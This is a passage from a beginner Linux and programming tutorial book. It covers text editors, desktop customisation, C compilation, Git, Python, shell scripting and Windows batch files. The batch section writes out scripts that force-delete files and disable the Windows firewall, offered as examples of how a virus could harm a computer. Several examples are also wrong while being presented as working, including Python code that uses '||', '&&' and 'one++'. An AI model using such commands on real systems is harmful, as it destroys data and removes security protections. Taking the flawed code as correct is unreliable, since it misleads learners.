guess just typing in :q will exit Vi without writing the changes to the file you
have been working in. If Vi objects to a request to stop the program you can
add a bash (!) sign to the command. :q! will definitely stop Vi.
A popular clone of the Vi editor is Vim, which stands for Vi Improved. To

make live easy Vim comes with a graphical user interface and even its own
scripting language. The latter is heavily influenced by the Shell Scripting
Language. One major advantage of Vim over Vi is that users are able to keep
open multiple windows. Previously you had to open a new terminal to start
another iteration of Vi and two iterations were never connected. With the candy
colored sections of text and computer code making sense of multiple Vim
windows is no easy task.
2.2 EMACS
Another very important text editor for Linux is EMACS. It was written back in
1976 by Richard Stallman (the father of Open Source Software) and Guy L.
Steele, Jr. EMACS is not an easy text editor. Over the years its functionality
has grown incredibly. Some users have quipped that the best way to learn
EMACS is through Vim.
If you’re version of Linux does not come installed with EMACS just type in
username@ubuntu:~$ sudo apt-get install emacs24
Once installed you can run the editor and open a file at once by typing in
username@ubuntu:~$ emacs file
Most EMACS commands make use of the Control (Ctrl) button in combination
with another key. For example: after you start the EMACS editor type hold
down Control and press h for a help. This key combination is denoted with C-
h.
If you initially started EMACS without a reference to a file you need to create
one with
C-x + C-f
You are then prompted for a filename.
After you have completed editing a file you can save the file changes with
C-x + C-s
You can find it in your directory under the name which you used to open
EMACS.
To close down EMACS use
C-x + C-c
It will however prompt you to save the present changes to the file you made.
Beyond these basic operations EMACs has a whole slew of text editing
hotkeys, most are well beyond the scope of this text. It has lead Vi/Vim
advocates to joke that EMACS is ‘a great operating system, lacking only a
decent editor’. This is certainly not an exaggeration, with EMACS Lisp, a
dialect of the Lisp programming language; users can extend the editor with
custom made commands such as new key bindings.
Below is an example of Lisp, the Hello, world! example. Place the code in a
file called helloworld.lisp with your favorite text editor.
; hello world lisp program.
(print "Hello, world!")
Make sure you have the clisp interpreter/compiler installed with

username@ubuntu:~$ sudo apt-get install clisp
Then run the example as follows
username@ubuntu:~$ clisp helloworld.lisp
Output should be
Hello, world!
Concluding remarks on your choice of text editor
There are plenty of other text editors for Linux: Nano, Geany and Jed just to
name a few. There is no point in getting familiar with all of them. I suggest
concentrating on getting to know either Vi/Vim or EMACS very well beyond
the commands I mentioned here. However, with what you have learned in this
chapter you will be able to do the basics: change files and save them. Few
professionals expect people to know more commands than what I have taught
you by heart. The choice of text editor is a personal one and I think ease of use
should be a priority.
Paragraph 3. A new Desktop environment
Installing Cinnamon
Chances are if you have Ubuntu you have had enough of the Unity interface. It
certainly wasn’t Mark Shuttleworth’s best idea. There are plenty of other
alternatives to Ubuntu. One of them is Linux Mint, which started as an Ubuntu
fork but has become to some more important. Mint comes with the option of
several Desktop Environments or OS GUIs. One such GUI is Cinnamon, a very
plain Windows type interface that is easy to use. Cinnamon can also be
installed for Ubuntu. This extra content to the book will describe how it can be
installed with the following commands
sudo add-apt-repository -y ppa:gwendal-lebihan-dev/cinnamon-nightly
sudo apt-get update
sudo apt-get install cinnamon
The next time you start Ubuntu you will be asked which environment you want
in the login screen.
Just as important to installing Cinnamon is uninstalling it if the environment
doesn’t feel right to you. This can be accomplished with the following two
commands.
sudo apt-get purge cinnamon* nemo-* cjs muffin* python-nemo
sudo add-apt-repository -r ppa:gwendal-lebihan-dev/cinnamon-nightly
Cinnamon is but one possible interface for your OS. Other options include
MATE, GNOME and LXDE. There are also graphical shells that alter
environments, Cinnamon started out as a shell for GNOME. Others include
KDE and of course Unity.
Installing Conky
A ordinary Linux Desktop environment can look quite boring, even with
Cinnamon installed. Conky is a system monitoring package that will display all
vital stats. In its barebones edition it is quite boring, but Conky is very easy
adjusted and plenty of developers have released their own variant. One of the
most popular are conky Red, Gray and Orange.
cd && wget -O orangec-noobslab-u.zip
http://drive.noobslab.com/data/conky/Red-Gray-Orange/conky-
orange.zip
unzip orangec-noobslab-u.zip && rm orangec-noobslab-u.zip
Paragraph 4. Introduction to programming
The final discussion point of this part of the book is on programming with
Linux. Officially that is the topic of the next part, but I feel it is difficult to
discuss without detailing the associated commands to compile and run a new
program. I might as well teach you how to program along with it.
Linux comes with its native open-source compiler GCC which stands for GNU
Compiler Collection. You can easily compile code for various programming
languages such as C, C++, Objective-C and FORTRAN. In the example below
I show you how to compile a very simple, ‘Hello, World!’, program. First we
need source code. Source is written by the programmer in a logical manner that
resembles mathematical statements. As source code needs to be clear to those
who program it is not possible for your CPU to process the statements and do
what you want. The program first needs to be compiled into Object code so a
computer can understand it.
So let’s write a source code program. Use gedit to open a file called
‘helloworld.c’. The extension ‘.c’ makes it clear this is a source code written
in the C programming language. After you have opened the file you can write
you very first program (if you exclude the AWK examples from the previous
chapter).
/* Hello World program */
#include<stdio.h>
int main()
{
printf("Hello World!");
}
Be sure to copy the code exactly. Copying source code from a text book is
notoriously boring and time-consuming but if you make a typo it will never run.
The program itself is simple. With int main we start our program. Every C
program has such a line and most other languages have a similar line. The
actual program then executes every statement within the two curly braces { }.
In this case there is only one statement ‘ printf("Hello World!");’. This line
executes the function printf which is a prepared piece if code everybody uses.
The function can be found in the library stdio.h which is why there is a
#include line at the top. Printf will display anything between the quote marks
onto the terminal, in this case the words Hello, World! Now we can compile
the program. Remember where you saved helloworld.c!
username@ubuntu:~$ gcc helloworld.c –o helloworld
The command structure is simple. We start by calling gcc and obviously we
want to compile the file called helloworld.c. If we leave it at that gcc will
indeed compile the file and store the binary called a.out. This may work fine
but at the risk of overwriting the binaries if you perform the command again.
The –o flag states we want to save the compiler output in helloworld.
If everything went correctly we can run our program as follows
username@ubuntu:~$ ./helloworld
As output you should see the sentence Hello World! printed into the terminal.
Congratulations, you have just created you’re first little program!
EXTRA: Introduction to Git & GitHub
Introduction to Git & GitHub
GitHub is an online repository for source-code. Developers can use GitHub to
organize projects and ensure that participants have one common version of a
project to work with. Developers maintain this code on their local computer
and use the Git version control system to maintain the online repository
(repos). Git was developed by Linus Torvalds after his dissatisfaction with the
previous proprietary system, BitKeeper.
Creating GitHub account and an repo
To store your program source code on GitHub you first need an account.
Creating an account is easy - just surf to https://github.com/, click the green
button ‘Sign up’ and fill in the necessary details. But do keep a note of your
login name, email address and password. After you have an account you need
to create a new repo, to store your project. This is made easy in the main
screen of your account, just click the green button ‘+ New Repository’. Then
choose a name, such as hackbook and ensure the repo is public. Now click
‘create repository’. After the repo was made you are shown a selection of
options for adding local files on your computer to your online repo. This guide
will continue to show you how that is done.
Figure 41. The GitHub start website
Installing and configuring Git
First you need to install the Git version control system on your Linux machine.
Type the following command into your Terminal.
sudo apt-get install git
After you have completed the installation use the following two commands to
configure your local repository. Use the username and email address provided
for the GitHub account.
git config --global user.name "username"
git config --global user.email "email address"
Now you need to create a directory on you Linux machine in which you can
work on your program and upload it to GitHub. Create a directory called
hackbook and navigate into it. Then use the git init function to initialize it as a
Git repo.
mkdir hackbook
cd hackbook
git init
The output will read as follows
Initialized empty Git repository in
/home/user_name/project_name/.git/
The part in Italics depends on your own Linux machine and folder name. We
are now set to create a file in the local repository and attempt to place it on the
remote GitHub repo. First we need a file. Just create a small text file or even a
Mark Down (.MD) and write something in it.
Updating local repository
Before files are send to GitHub they are first placed in a staging area locally
on your computer. With the command git add you add files to the staging area
(index). Use a dot ‘.’ to upload the entire folder or use Tab to autocomplete if
you just want to upload a chosen file.
git add .
With the git commit command you can decide that after you have no alterations
planned to send the files to your official local repository. This split in local
repo and working files is handy to prevent errors or in case you would change
your mind. This comes at the cost of complexity.
Figure 42. Git and GitHub model

Astute readers will note a problem. Sending out files to GitHub this way is
easy if you are the only one maintaining the project. However, with more than
just a few contributors the situation quickly becomes complicated as nobody is
sure whose version of the software is current. That will be part of the second
half of this tutorial. First we still need to send the files to the remote repo on
GitHub.
Before you commit the files from your directory you can use the command git
status to see if you need to commit anything. It would be best to use the commit
function often so your local repo is always up to date.
git status
This returns the following comment details
On branch master
Initial commit
Changes to be committed:
(use "git rm --cached <file>..." to unstage)
new file: testHackBook.MD
You can see I have placed a Markdown file into the staging area. The comment
above even suggests a method to unstage files. Now if you use the commit
command and then the status command the situation has changed. Note how we
add a small comment at the end of the commit command. This will become
visible in GitHub and will make it easier to distinguish between recent
updates.
git commit -m 'first commit'
git status
Now the following comment details are conveyed.
On branch master
nothing to commit, working directory clean
You have successfully created your own local repository which is distinct from
the working folder. Now you still need to connect your local repository with
that of the GitHub repo. One thing is certain; typing in the entire URL to the
GitHub repo will soon become tiresome, not in the least because it is error
prone. Luckily you only need to do it once per project with the following
command.
git remote add origin https://github.com/username/projectname
The final command defined below will place what is in your local repo onto
the GitHub repo. This command is final and can’t be withdrawn, so be sure
what you upload! In short it states that the local ‘master’ will be pushed out to
the remote ‘origin’ defined in the previous command sequence.
git push -u origin master
Input your GitHub username and password when prompted. If all has gone
well your file has made its way to the GitHub website. Go check it out!
Whenever you have updated your project you can instantly place them on
GitHub for everybody else to download.
On a side note, often we only want to upload source code to GitHub and not,
for example, compiled code. With Git we can be selective of the files we add
and commit to the stages between your working directory and the remote
GitHub repo. With a .gitignore files we can exclude files with extensions of
our choice. The first step is to create such a .gitignore file.
echo “.txt” > .gitignore
In this instance we do not commit files with the extension .txt. This is just to
illustrate the possibility but perhaps you don’t want to place files filled with
notes online.
If we were to use git status again we would get a message that the file is
untracked and has yet to be committed. With git add we can place it in the
staging area.
git add .gitignore
From there on the procedure is similar to any other commit and push command
cycle. If we were to create more code in our working directory next time and
add files to the staging area those with the .txt extension will be ignored. Be
careful, .gitignore, will be pushed to the remote repo as well. If you have
forgotten about its existence you can be bug hunting for a while.
Downloading files with Git
Using the GitBash command line tool in Windows or just a Terminal in Linux it
is very simple to download files from a repository. To obtain a copy of a Git
repo use the following command sequence.
git clone /path/to/repository
If you’re downloading the files from a website you need to add the full path of
the website as a prefix to repository path. An example would be to download
the hackbook code below would proceed as
git clone https://github.com/username/hackbook
Now you have downloaded the repository into the present folder you have
navigated to. Navigate to that folder to see its content.
cd hackbook/
However, with clone you are merely making a copy of a file. It works similarly
to wget. It does not update your local repo and sync it with the GitHub repo.
With pull this can be achieved. In theory, if another developer had updated the
GitHub repo your own repo will be changed to reflect that.
git pull https://github.com/username/hackbook
However, astute readers will notice a problem. What if the GitHub repo has
been changed but so has your own local repo, and you don’t want your changes
to be erased. Well, we can use a two-step command. With fetch we get a copy
of the GitHub repo and store it as local branch, not the local repo that you’re
actively working with.
git fetch https://github.com/username/hackbook
git merge
After we have reviewed the code we can use the command merge to put the
two branches together.
git merge localbranch
Branching
This final command leads us to the most interesting feature of GitHub for
professional users: branching. If you want to include a new feature into your
project but keep a copy of the old one (the way it was) then you could use the
branch command. This will set up a parallel development branch of your code
that you can alter without fear of getting your code mixed up. The following
step set up such a branch and we call it anotherbranch.
git branch anotherbranch
To go to this branch and work on the code use the checkout command as
follows
git checkout anotherbranch
Now you are all set to make changes to the second branch. You can create as
many branches as you want though I suspect it is usually no more than two: one
master branch and one branch for testing code. So let’s test out branching.
After you have performed the two commands above create a new text file
called test.txt and place some dummy sentences in to. Copy the file into your
project folder. Now if we perform ‘git status’ we get the message there has
been an untracked file. Next we add it to the staging area with ‘git add .’ and
again ask the status with ‘git status’. As we are still working in the second
branch called anotherbranch the file is committed to this branch and not the
master branch. To commit the file to anotherbranch use the command ‘git
commit –m “add textfile”’ to commit the branch.
If you now use the checkout to switch to the master branch and use ls
git checkout master
ls
You will notice that the textfile was not added to the master branch
Merging and deleting branches
We can choose to merge branches if we want to. The method behind it is
simple, go to the branch that you want to see over-written. In this case we want
to see the master branch over-written by anotherbranch as it contains a file
we have been working on. Use the following command to merge the two
branches
git merge anotherbranch
If we use ‘ls’ we will see the file is added to the master branch. With ‘git
status’ we see that this branch is said to be one commit ahead of origin/master
that this found on GitHub. With ‘git push’ we can push this updated master
branch to the remote repo if we want.
Finally we can choose to delete a branch. As an example we will delete the
branch anotherbranch with the following command.
git branch –d anotherbranch
It is now removed
Conclusion
If you find Git and GitHub still to be too daunting then try out a GUI client. For
Windows there is GitHub (not to be confused with the website) while git-cola
and SmartGit can be used for Linux (and Windows). On the next page I end this
chapter with some commonly used commands to get the lay of the land.
Finding the current HEAD
To find the most current and up to date master branch use the following
command
git checkout –f HEAD
A git situation
You have made a mess of things and you want to overwrite your local branch
with the origin/master
git checkout master
git fetch --all
git reset --hard origin/master
List all branches
To get an overview of all the branches you can use the branch command.
Switch –a will show all local and remote bracnhes while –r shows only the
remote branches.
git branch –a
git branch –r
List all commits
Using the git log function we can list all previous commits and to what
branches those commits belonged to
git log --all --decorate --oneline
The vanilla command git log –all can be very verbose. To get a better
overview add the --decorate and --oneline switches. This will ensure that
only small summary will be printed and they will be colour coordinated.
A very convenient additional switch is --graph. Now all commits are aligned
along their branches this showing how each branch evolved over time.
Tracking changes to a single file
For each file in the repository it is possible to track what changes have been
made over time, with the --follow switch. In the case below the index.php file
is tracked. When you are testing your software tracking changes and see who
and when those changes were made is invaluable.
git log --follow index.php
Tracking your peers
With the shortlog command you can obtain an overview of every commit made
to a project organized according to develop.
git shortlog
Resolving Merge conflict
A very common problem that occurs with Git is that more than one developer
has been coding a particular file. If that happens the merge command will try
its best to include the two or more current branches into the same file. Each
section of conflicting code is then labeled. This makes it easy for the
developer who is tasked with integrating every branch to see what needs to be
deleted and what code can be kept. An example is as follow. Suppose I create
a small C program called merge.c
After a while tow developers code a slightly different example. They each
have one unique line.
The original program is as follows. It’s the familiar Hello, World! Example.
#include<stdio.h>
main()
{
printf("Hello World");
}
But developer A changes the print statement to
printf("Hello from developer A");
And developer use yet another variation
printf("Hello and good afternoon");
We will now get a merge conflict. After using the command Git merge the
result in merge.c will look as follows
#include<stdio.h>
main()
{
<<<<<<< HEAD
printf("Hello from developer A");
=======
printf("Hello and good afternoon");
>>>>>>> branch-a
}
Git has clearly marked which part of the code was written by which developer.
However, the code won’t run with the markings from git. So a developer is
forced to make choices.
Part 2. Programming
Chapter 1 Beginning Programming with
Python
Introduction to programming
This part of the book will deal with programming in Linux. In chapter 1 I
explain the basics of programming with the Python, an easy to learn yet
powerful programming language. I discuss topics such as conditional
statements that allow programs to make choices, but also loops, user input and
functions. These are considered the basic tenants of all programming
languages. In subsequent chapters more difficult topics are discussed. These
topics are detailed with the use of different programming languages such as C,
Java and Perl. An example program at the start of each chapter will show that
the basic programming concepts are similar but are simply written in the syntax
of that language.
What is Python?
Python is an interpreted programming language developed by Guido van
Rossum. It was first released in 1991. Interpreted means it will run on the fly
as soon as a python program is started. There is no need to convert the file
from source code to machine ready code (zeroes and one, also known as
Machine Language). Instead Python feels almost like a file filled with
command line arguments that are run one after the other. The python scripts are
thus used to store the numerous and complex commands we want to execute on
a regular basis.
Variables
There are several basic functions every program should be able to perform,
without them there would be no point in computers. The first one is memory, or
storing data in a variable. With every complicated piece of math you ordinarily
write down intermediary results to help you along the way. Parts of results can
be named, such as assigning letters X, Y and Z to them. Programming languages
allow you to do the same. Use Gedit or you favorite text editor to open a file
called ‘first.py’ and type in the following four lines of code. The extension -
.py - is a reminder this is a Python program.
#!/usr/bin/python
x = 'This is a String'
y=3
z = True
We have now assigned values to three variables. The first is a string of

characters which include the empty space.It is delimited by single quotes - '' .
The second variable is an integer variable containing the value 3, if three had
been written between quotes it would have been a string. Finally we assigned
a Boolean value to z. Boolean values True and False are self-explanatory, they
come in use with conditional statements. As all variables can change because
of user input or an algorithm the flow of a program can change. Boolean
variables are often very useful to change a programs course. Also, note the
weird first line that we had to type. As you may have guessed this is a
household chore. With ‘#!/usr/bin/python’ we tell the command line to execute
the script as a python script. Just cd to /usr/bin/ to check it out.
You can run this program, first.py, by typing the following into the command
line.
username@ubuntu:~$ python first.py
The program will run, but sadly there is nothing for the user to see because the
three variables are deleted as soon as the program ends.
Output
A program is of no interest if after a calculation is does not produce output. In
this book we will forgo the use of graphical windows and menus. They are
cool but absolutely not necessary. In Python the print function will output
anything you want to the Linux Terminal.
print "Hello World!"
If you add the previous line below the three lines part of first.py and then run
the program you will see the following output
Hello World!
The program once again assigns the three variables x, y and z the same values
we assigned them before. Then it prints out ‘Hello World!’. The three
variables are upon completion of the program again deleted from memory.
Input
To further add functionality to a program we can ask for user input. In python
the function raw_input() will pause the program until the user types something
into the command line and presses the Enter-button. By adding this statements
below the four lines already written we get our first bit of interactive
functionality. However, if you run the program you see the words Hello World
printed out and then a flickering underscore indicating you can type something.
If you do and press Enter the program simply ends.
As you may have guessed the text the user typed was never used. We need to
assign it to a variable to store it. The two lines of code below allow you to
store the input from raw_input() and store it in variable called mydata. On the
second line the data of that variable is printed to the command line.
mydata = raw_input('Type something:')

print (mydata)
Notice that when the program is run the user sees the words ‘Type something:’
printed on the command line with a prompt. This is an optional feature of the
function raw_input(). It is called a function parameter and using them can make
life much simpler. To learn about all the possible parameters of a built-in
function you can use google. Go to
https://docs.python.org/2/library/functions.html for a list of functions. If you
select raw_input() you can see that it only has one optional parameter called
[prompt]. Whatever you write in its place will be printed on the command line.
You can thus guide users to the correct input.
Conditional Statements
So far our program has been linear. Each line in the code is executed one by
one from top to bottom. Most programs have at least some branching of
possible actions. One universal tool in programming is the if-else statement. It
gives us the flexibility to choose a set of lines to execute only if a predefined
condition is met. Let’s have a look at an example code
#!/usr/bin/python
x = int(raw_input("Please enter an integer: "))
if x < 4:
print('That is a small number')
else:
print('That is a larger number')
I hope you understand what happens here. The if statements guards whether or
not the indented line underneath it will be executed. If the guard evaluates to
true it will. Our input should be 3 or lower. If it is 4 or higher the guard will
evaluate to false and it won’t execute. Instead, the indented statement below -
else: - will be executed. You can view this as a very simple tree. Everything
above the if-else statements is the root, which then branches out into two
directions. Note the statements indentation. In most programming languages this
is done to make it more readable. However, in python indentation is a
necessity as it clarifies which lines belong to the either the if-else block and
which do not. As an example, add another print statement to the if-block as
follows.
if x < 4:
print(‘That is a small number’)
print(‘I can print even more…’)
else: …..
The second line will also be printed if the guard evaluates to true. Any
statement indented with a tab after either the if or else block belongs to that
block and will execute depending on the guard. If a statement is not indented
the conditional if-else block is over.
The else: statement is purely optional. In fact you can also have conditional
statements within conditional statements.
So far I have used the mathematical operator < as guard, but from you’re high
school math’s you should know more. Each of the following can be used to as
part of a conditional statement.
< less than

<= less than or equal to
> greater than
>= greater than or equal to
== equal
!= not equal
You can chain as many guards as you like with || which means or, && which
means and. An example would as follows
if x < 0 || x == 100 || x >= 1000:

print(‘We want negative number, and 100’)
print(‘As well as numbers larger than 1000’)
else: …..
While and For loops
One of the strengths of computers is that they can perform actions many times
over rapidly. So far our programs have been linear. They execute from top to
bottom. Using the conditional statement added zest as we can define the
program to do perform certain actions while skipping others. However with
while and for loops we can repeat certain parts of the program until a
condition has been. In fact with the while loop a program can in theory run for
ever, until input that meets the loop condition that will cause it to break out of
that loop.
A while-loop has three components that are of important: an initialized
variable, a conditional statement and an iterator. The structure of the while
loop looks as follows
Initialized variable:
while (conditional statement)
do something’
Iterator
When the indentation stops after the while declaration the program can run its
course again, at least if the conditional statement has been met. Below is an
actual example of how to use the while loop
#!/usr/bin/python
one = 0
while one < 5:
print “We are at “ + one
one++
print(“And now we are out of the loop”)
I hope you have a good idea of what this code does before you run it. The
while-loop will run as long as the value for the variable one is 4 or smaller.
Through each iteration two lines are run by the computer. The first is the line
that prints a small sentence and the variable to the command line. The second
line adds 1 to variable one. So after a single iteration of loop the value for one
is 1, then it is 2, then 3, then 4.
The statement - one++ - might at first be confusing. You can also write it as -
one = one + 1 - if you want clarity. What it is essentially means is that current
value of one is retrieved. It is then incremented by 1. Subsequently the current
value is overwritten by the new value.
After the variable one reaches value 4 the while statement won’t be run. The
program will break out of the while block and run the next line in the program,
in this case a print statement that says “And now we are out of the loop”.
Remember, all the indented lines after the while statement are part of the loop
and will be run until the condition evaluates to false. You can add as many
lines as you like to your loop.
Unlike the While the For-loop will also execute part of the code repeatedly but
do so for a finite amount of time.
#!/usr/bin/python
fruits = ["banana", "strawberry", "orange", "apple"]
for food in fruits:
if food == "strawberry":
print("Strawberry yet again!")
print("Great, delicious " + food)
The program above shows the basic of a for-loop. We first create a list. In this
case it is a list of four string values that we call fruits. The for-loop will
iterate through each member of this finite list. Each time a member is plucked
and temporarily placed in variable food. If everything goes according to plan
the loop will iterate four times. Each time food will have a different value, but
only once will the conditional guard evaluate to true and print the line
“Strawberry yet again!”.
Functions
While writing programs you will quickly discover that certain parts will
repeat themselves. It would be a lot easier if you could simply write a piece of
code and re-use it as often as you like. In Python and other languages such
pieces of code are known as functions, in Java they are called methods.
In the piece of code below we create a function called printme() which is later
on called. The way this works is simple, all functions start with the keyword
def. Now Python knows this is a function. The function won’t run on its own. If
the code is never called it will simply be ignored during its run.
Python requires that all functions are placed at the start of the file. As you may
remember, Python is interpreted. It runs the code on the fly. That means it will
need to know about the function printme() before it is run. After the function is
written we run it once with the line that just says printme().
#!/usr/bin/python
def printme():
print "Yet again we say ‘Hello, World!’"
return;
printme()
After you have run this little example you may recognize something. The way
that the function printme() is called feels similar to the way we have used
raw_input(). Indeed raw_input() is also a function that somebody else has
already written. Just like raw_input() you can call printme() as often as you
like. For an simple example like this we won’t write a function. Just using
print will suffice. Indeed print is also a function.
Functions are a powerful tool to use. We write down functions when we are
performing an action for which there is no ready-made function and we think
we may use it multiple times in a program.
Memorizing functions that have already been written is not easy, you will need
to get familiar with Python. After all, you don’t want to write code if there is
already a function available. The best way to proceed is to find with Google a
sample code of what you want to do. In time you will learn to memorize
functions. Though I admit I have written plenty of functions only to later
discover there was already one available.
Conclusion
Python is an easy programming language to master. There are no additional
steps required run the code. Compiling is not necessary and Python has a lot of
easy to master functions. If you are new to programming and you want to delve
deeper into the topic than only 3 languages are an option: Java, C and Python.
Java is still the most popular programming language, but it does require the
installation of a development kit so you can compile your code. C is popular at
universities who want to teach students all the nitty gritty of Computer Science.
With Python you can do much of the same with a lot less code. If you need to
choose a language then let it be Python!
Chapter 2 Shell scripting and using

Shell as a programming language
Shell Scripting
In Linux you can easily open Gedit and type some code to test a programming
idea. But you can also use the Shell itself for programming. This has two
advantages: the Shell is always available and you can use Linux commands
directly to perform small utility functions. With shell programming you can
pretty much use all Terminal commands you have learned and control every
aspect of the system. For hacking purposes you need root access to perform
tasks on a target but it is access to shell scripts that truly give you user power.
The Shell (Terminal) has some superficial similarities to the Windows
command prompt. However, it is capable of running more complex functions.
Shell scripts are little programs and do not require the user to compile them.
Shell programming is done in a file just like Python programming.
Our first Shell script
With Gedit you open a file with the extension .sh - for shell. Type in in the
following line into Terminal to start writing the Hello, world example in shell.
$ gedit helloworld.sh
Now you have an empty shell file open. To make use of shell functions the first
line needs to be #!/bin/bash – the #! is also referred to as shebang and is
necessary to run the interpreter program of the Bourne Again Shell. We
complete this shell example by adding two more lines.
#!/bin/bash
STRING="Hello Hackers!!"
echo $STRING
The first additional line states that the word string Hello World! needs to be
stored in a variable named STRING while the second additional line states
that the variable should be printed (echoed) to the command line. The dollar
sign $ is vital to denote that it is a variable.
After saving and exiting this file we can try and run our first script. Remember
that shell programs don’t need to be compiled as they merely run shell
commands in a particular sequence that can also be performed on the command
line. The shell program will take care of the compiling for you by doing that at
run-time. The following line runs the code.
$ ./helloworld.sh
User input
You can also get input from the user by asking them to type into the command
line. Such input can be used to direct the flow of a program with the
conditional statement - just like in Python.
#!/bin/bash
echo Hello user!
echo Please type in F if you’re female or M if you’re male.
read gender
if [ $gender = F ]; then
echo Hello woman!
elif [ $gender = M ]; then
echo Hello Man!
else
echo Error, incorrect input!
exit 1
fi
exit 0
Unlike with Python the indentation is entirely optional; it is simply convenient

for those reading your code. With the command read user input is requested.
When they hit the Enter-button the data they type is placed into the variable
gender and the program resumes. Next follows a conditional check. If the input
is either F or M corresponding lines are printed out. As there is no check to
what a user can input there is also a third option that says the input was not as
requested. The conditional statements are finished with fi. Shell scripting is
very easy, but there are a few things that may trip beginners. Notice the spaces
in the conditional statement, between the brackets - [ ] - and the comparison of
variable gender and the character. If you omit the spaces the program won’t
run as intended, Shell needs the spaces to delimit programming functions!
Another difficult topic with Shell is Boolean evaluation. In the above code we
used one equal sign = to compare a character with whatever value we had
assigned to $gender. Comparing numerical values is different and is done with
–eq (equal) and –ne (not equal). Below is a table with the most commonly
used variants.
Function Comparator
String tests
S1 equals s2 s1 = s2
S1 does not equal s2 s1 != s2
Numeric tests
Integer a is equal to b a –eq b
Integer a is not equal to b a –ne b
Integer a is greater than b a –gt b
Integer a is greater than or equal to b a –ge b
Integer a is less than b a –lt b
Integer a is less than or equal to b a –le b
Environment variables
In the very first example of this chapter we assigned a String value to the
variable STRING. Linux also has a number of environment variables used to
store information about the system. These can also be used in scripts. Below is
a small script that prints out the most common variables.
#!/bin/bash
echo $PWD
echo $PATH
echo $HOME
echo $SHELL
echo $USER
As I hinted in the introduction we can use shell scripts to run ordinary Linux
commands such as those you learned in the first part of the book. However,
commands can be used in two ways. They can be run as is or be evaluated to
see if the results meet a certain criteria. The latter is similar to a pipe |
#!/bin/bash
if [ $(whoami) = "root" ]
then
echo "You have God-mode on"
else
echo "You're regular Joe"
fi
The above example illustrates this concept. In this script the command whoami
is run and then compared with the string value root. Note the Dollar sign $ and
the two braces () around whoami. If they were there the out of the command
would be printed to Terminal. An older way to achieve the same is through the
use of back ticks ` - not single quotes ‘ placed around the command -
`whoami`. You will find the back tick on the keyboard with the tilde ~ key.
Now that the introduction to Shell programming is over we will write a
program that creates a backup of all files within a designated directory that can
be inputted from the command line.
#!/bin/bash
# Script to make back-up copies of files in current directory

CURDIR=$(pwd)
ORIGFILES=$(ls)
UNWANTED="bak"
echo "Getting ready to back up $CURDIR" # the current directory is retrieved with
pwd
if [[ $ORIGFILES =~ $UNWANTED ]] #matched

then
echo "Already bakked - what now?"; exit 1
else
for f in $ORIGFILES # for all files in listed directory
do
cp $f $f.bak # copy the file and add extension .bak to the file
done
fi
Another addition to the program is the ability to zip all of the backup files. The
following lines can be typed or pasted below the lines we already have.
echo ‘Zipping up the files”
tar -cf $(pwd).tar *.bak
echo “done”
exit 0
With shell scripts we can also start other programs easily. In fact, shell is often
used as glue for starting multiple services written in other programming
languages. Try it with our Python examples.
You can add the ampersand - & - sign after such a startup command to run the
program in the background. This way you can start multiple programs
simultaneously. You can also add nohup before your application to ensure the
application continue after you log out of computer. The change directory
command cd can be used in Shell just like in the command line. This allows
you to organize code and scripts in separate folders while providing one
simple script as interface.
Wrap up
Now you should be able to understand that shell programming is very
powerful. It is at the core of a Linux system administrator’s toolbox.
Programmers also like it, they often code small examples to test out new ideas
before they move on to programming languages that non-Linux systems can also
understand.
Compared to true commercial applications they are nothing in size and
complexity. Nonetheless dealing with complexity is an important programming
skill. Programmers work on small bits of code at a time. They make sure that
the parts work fine. If the end result isn’t what they hoped it would be they can
trace the problem quickly to one of the constituent problems. One important
thing to remember is that with shell scripts you can easily execute other shell
scripts, or program written in another language. In fact, with many open source
software projects you will see a folder containing files with the extension .sh
and .bat (batch file) which is the windows equivalent to a script. This will be
the topic of discussion in the next paragraph.
Other programming languages
If you use the Shell in the way described above you’re performing shell
scripting, probably the most common programming tasks anyone on Linux
performs. Unlike other programming languages shell scripts are not compiled,
instead they are interpreted. The commands in a Shell script are executed
directly as though a user was typing them in the command line. The advantages
are that more complex commands are possible: you can use conditional
statements or perform a task multiple times with a loop. Other interpreted
languages besides SHELL include Python, BASIC and the Windows equivalent
to Shell called PowerShell.
Batch programming in Windows
Windows has an equivalent to Shell programming called Batch programming.
Such scripts are stored in Batch files that have the file extension .bat or .cmd
with Windows NT. Batch files can be written with a simple text editor such as
Notepad or WordPad. Our first example will be a three line program that prints
Hello, World!
@ECHO off
ECHO Hello World!
PAUSE
Save the program as helloworld.bat as a plain text documents in your Windows

Desktop folder. After you’re finished you will find an icon containing two little
gears entitled helloworld. You have now created you’re first batch program.
You don’t need to compile, it is interpreted just like a Shell program. The
program is executed either by double-clicking on the icon or by using cmd and
navigating to Desktop. Starting the program requires the user to type in the
name of the file, no prefixes such as .\ or extensions such as .bat are necessary.
The output of the program should be as follows
Hello World!
Press any key to continue . . .
This may be a little but surprising, but it is logical. If the program does not
include the command PAUSE it will stop immediately after and you cannot see
the output. @ECHO off prevents the command prompts from being printed
before every line. The following program has more functionality.
@echo off
echo Loading.
ping www.google.com -n 2 > nul
cls
echo Loading..
ping localhost -n 2 > nul
cls
echo Loading...
This program prints out the line loading three times. Each time with an added
dot. Before this happens the screen is cleared off all printout with CLS to make
it look like an animation. Meanwhile the ping command is executed twice as an
example of commands that takes at least a few seconds to complete.
Batch can be extended by requesting user input. This can be accomplished with
the set command.
set /P Phrase=Please, say something!
This will place the user input in variable Phrase. /P is a necessary switch
denoting user input. Set also allows us to post a little message to the user with
the keyword Phrase.
As you may have heard on the news, over the last two decades Windows can
be a vulnerable operating system. Much has improved, but unsuspecting users
are still known to download files with viruses, worms and rootkits. For a start
- a .bat file can contain dangerous file executions such as file deletion with del
and file renaming with ren. It goes without saying that it will ruin your
Windows OS if you were to have these commands run through your entire file
system.
A careful tests will illustrate my point. Create a folder called test on your
Desktop that contains a file called hello.txt, which can remain empty. By
executing the following script you will delete everything in that folder, in this
case hello.txt.
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\Desktop\test\*.*"
::---------------------------::
Alternatively you can easily switch off the firewall
@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
Both instances are just examples of how easy it is to screw up Windows if you
want to. I hope these little examples have shown how you can infect a
computer with a virus or worm if it is transmitted as an attachment through
Outlook, or with an USB-stick.
Conclusion
With chapter 2 we dealt with Shell scripting. You may not have learned any
new syntax as we already discussed conditional statements and loop in chapter
1. Yet, learning to use shell is important for any Linux user. Finally this chapter
briefly touched upon Batch programming in Windows. It was really just an
excursion to show there is no magic taking place. To top it off there is yet
another excursion, a brief chapter on programming in SWIFT. After that
chapter 3 will detail the memory pointers in C.
Introduction to Swift
